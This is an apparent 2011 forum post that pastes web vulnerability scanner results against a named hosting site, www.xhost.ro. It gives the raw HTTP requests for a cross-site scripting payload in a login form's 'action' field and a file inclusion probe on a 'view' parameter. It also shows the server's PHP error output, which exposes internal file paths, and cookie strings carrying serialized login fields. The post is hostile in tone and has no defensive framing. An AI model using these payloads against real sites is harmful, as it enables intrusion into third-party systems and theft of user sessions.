Daddymx79 Posted April 20, 2011

Ustupid MFU to suport Apr 2

This vulnerability affects /host/phrame.php.
Discovered by: Scripting (XSS.script).
URL encoded POST input action was set to 1<ScRiPt >prompt(946395)</ScRiPt>

POST /host/phrame.php HTTP/1.1
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=gjk9h978ygb9797h98h99h9898; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40cevaa.ro%22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22O77777777777encodebase64%3D%22%3Bs%3A2%3A%22no%22%3Bi%3A10%3B%7D
Host: www.xhost.ro
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home)

action=1%3cScRiPt%20%3eprompt%28946395%29%3c%2fScRiPt%3e&isCripted=&password=parola&rememberMy=on&username=ceva@ceva.ro

Notice: No mappings found for action '1' in /home/www/lib/phrame/ActionController.php on line 128
Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144

/host/index.php?view=1some_inexistent_file_with_long_name HTTP/1.1
Cookie: PHPSESSID=11111111111111111111111111; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40ceva.ro22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22encodebase64O%3A2%3A%22no%22%3Bi%3A10%3B%7D
Host: www.xhost.ro
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home)

This vulnerability affects /host/panel.php.
Discovered by: Scripting (File_Inclusion.script).
<b>Warning</b>: file_get_contents(1some_inexistent_file_with_long_name) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/home/www/lib/toplabs/ui/Page.php</b> on line <b>286</b>

GET /host/panel.php?view=1some_inexistent_file_with_long_name HTTP/1.1
Cookie:

Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286
Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299
Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304
Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313
Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286
Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299
Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304
Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313

This vulnerability affects /host/phrame.php.
Discovered by: Scripting (Error_Message.script).
Attack details
URL encoded POST input action was set to
Error message found: <b>Fatal error</b>: Call to a member function getName() on a non-object in <b>/home/www/lib/phrame/ActionController.php</b> on line <b>144</b><br />

Notice: No mappings found for action '' in /home/www/lib/phrame/ActionController.php on line 128
Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144
Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286
Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299
Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304
Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313